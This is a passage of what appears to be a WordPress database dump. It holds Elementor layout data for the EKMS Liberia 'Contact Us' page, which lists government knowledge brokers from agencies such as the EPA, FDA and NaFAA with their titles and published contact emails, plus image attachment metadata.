\\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23059,3330,'_wp_attached_file','2021/01/kn.png'),(23060,3330,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:14:\"2021/01/kn.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"kn-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"kn-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23061,3331,'_elementor_edit_mode','builder'),(23062,3331,'_elementor_template_type','wp-page'),(23063,3331,'_elementor_version','3.0.16'),(23064,3331,'_wp_page_template','default'),(23065,3331,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br 